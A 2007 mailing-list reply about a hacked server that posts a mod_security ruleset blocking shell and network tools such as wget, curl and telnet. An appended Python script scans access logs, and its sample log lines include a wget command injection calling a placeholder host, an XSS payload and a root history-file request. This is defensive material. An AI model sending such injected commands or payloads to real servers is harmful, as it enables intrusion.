[thelist] Server Hacked

Mark Groen evolt at markgroen.com
Mon Feb 19 11:01:36 CST 2007


On Monday 19 February 2007 05:18, Hershel Robinson wrote:
> > Do you think it could be a cross site scripting problem?
> > I've seen that type of thing before. Is it an Apache+PHP server? If
> > so, grep the word iframe in your log file (or maybe the world
> > newhold). That way you'll find the offending IP.
>
> Cross-site scripting? On the server, the index.php page was edited. I
> have no explanation aside from to say that someone got on the server.
> Whether they 'broke' in or somehow found the password for FTP somewhere
> I cannot say.
>
> Hopefully the host will have a response. When they wake up this morning. :)

Using WHM/cpanel? Ask them if they have, or you can add mod_security to the 
WHM addons (scripts) usually found at the bottom of the left-hand links.

Sample config for same:

# mod_security 1.x syntax (SecFilter/SecFilterSelective); the 2.x branch replaced
# these directives with SecRule. THE_REQUEST is matched against the decoded request
# line, so each pattern below is a regular expression, not a literal string.
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective THE_REQUEST "/config.php?v=1&DIR "
SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "
SecFilterSelective THE_REQUEST "arta\.zip "
SecFilterSelective THE_REQUEST "cmd=cd\x20/var "
SecFilterSelective THE_REQUEST "HCL_path=http "
SecFilterSelective THE_REQUEST "clamav-partial "
SecFilterSelective THE_REQUEST "vi\.recover "
SecFilterSelective THE_REQUEST "netenberg "
SecFilterSelective THE_REQUEST "psybnc "
SecFilterSelective THE_REQUEST "fantastico_de_luxe "
SecFilterSelective THE_REQUEST "dc.txt "
SecFilterSelective THE_REQUEST "cd /var/spool/samba "
SecFilterSelective THE_REQUEST "chmod "
SecFilterSelective THE_REQUEST "perl "
SecFilterSelective THE_REQUEST "uname -a"
SecFilterSelective THE_REQUEST "\.htgroup"
SecFilterSelective THE_REQUEST "\.htaccess"
SecFilter "javascript\://"
SecFilter "img src=javascript"
SecFilterSelective THE_REQUEST "cd\.\."
SecFilterSelective THE_REQUEST "///cgi-bin"
SecFilterSelective THE_REQUEST "/cgi-bin///"
SecFilterSelective THE_REQUEST "/~root"
SecFilterSelective THE_REQUEST "/~ftp"
# Chained pair: block /htgrep only when the request also carries hdr=/,
# otherwise just log the /htgrep request and let it through
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"
SecFilterSelective THE_REQUEST "/htgrep" log,pass
SecFilterSelective THE_REQUEST "/\.history"
SecFilterSelective THE_REQUEST "/\.bash_history"
SecFilterSelective THE_REQUEST "/~nobody"
SecFilterSelective THE_REQUEST "<script"
SecFilterSelective THE_REQUEST "\?STRENGUR"
SecFilter "_PHPLIB\[libdir\]"
# Chained pair: a viewtopic.php request whose arguments call one of these PHP
# functions with a short numeric/hex argument. The ARGS directive and its regex
# must be written on one line; a line-wrapped pattern is a configuration error.
SecFilterSelective REQUEST_URI "/viewtopic\.php\?" chain
SecFilterSelective ARGS "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(([0-9a-fA-Fx]{1,3})\)"

-- 
cheers,

        mark
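The earlier reply suggests grepping the access log to find the offending IP, and the ruleset above lists the request patterns worth looking for. The following script is an added example (not from the thread or from mod_security) that applies a subset of those THE_REQUEST patterns to Apache access-log lines the way mod_security 1.x does, after URL-decoding, and reports which client IPs triggered which patterns. The log lines are constructed samples using documentation-range addresses; one of them shows that the trailing-space patterns such as "perl " also fire on ordinary search text, so hits still need a human look before anything is blocked.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Subset of the THE_REQUEST patterns from the posted ruleset, kept as regexes
# and applied case-insensitively (a choice made here, not a mod_security default claim).
PATTERNS = [r"wget ", r"curl ", r"perl ", r"chmod ", r"cd /tmp ", r"uname -a",
            r"/~root", r"/\.bash_history", r"<script", r"cd\.\.", r"///cgi-bin"]
COMPILED = [(p, re.compile(p, re.IGNORECASE)) for p in PATTERNS]

# Apache common/combined log prefix: client IP, ident, user, [timestamp], "request line", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')


def normalize(request_line):
    """Decode %XX escapes and '+' so percent-encoded variants cannot slip past the patterns."""
    return unquote_plus(request_line)


def match_request(request_line):
    """Return the pattern strings that fire on one raw request line (empty list if clean)."""
    decoded = normalize(request_line)
    return [p for p, rx in COMPILED if rx.search(decoded)]


def scan_log(lines):
    """Map each client IP to the set of patterns its requests triggered; unparsable lines are skipped."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for p in match_request(m.group("req")):
            hits[m.group("ip")].add(p)
    return dict(hits)


# Constructed sample log lines (documentation-range IPs), not taken from any real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Feb/2007:03:10:01 -0600] "GET /index.php HTTP/1.1" 200 2048',
    '203.0.113.5 - - [19/Feb/2007:03:12:44 -0600] "GET /index.php?cmd=cd%20/tmp%20;wget%20http://203.0.113.9/a.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [19/Feb/2007:03:13:02 -0600] "GET /guestbook.php?name=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300',
    '192.0.2.44 - - [19/Feb/2007:03:15:19 -0600] "GET /~root/.bash_history HTTP/1.0" 404 210',
    '198.51.100.7 - - [19/Feb/2007:03:16:40 -0600] "GET /search.php?q=perl+tutorial HTTP/1.1" 200 900',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, patterns in sorted(scan_log(SAMPLE_LOG).items()):
        print(ip, sorted(patterns))
```

The last sample address appears only because "perl tutorial" contains "perl ", which is exactly the kind of false positive to expect from substring rules before promoting them from log,pass to a blocking action.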
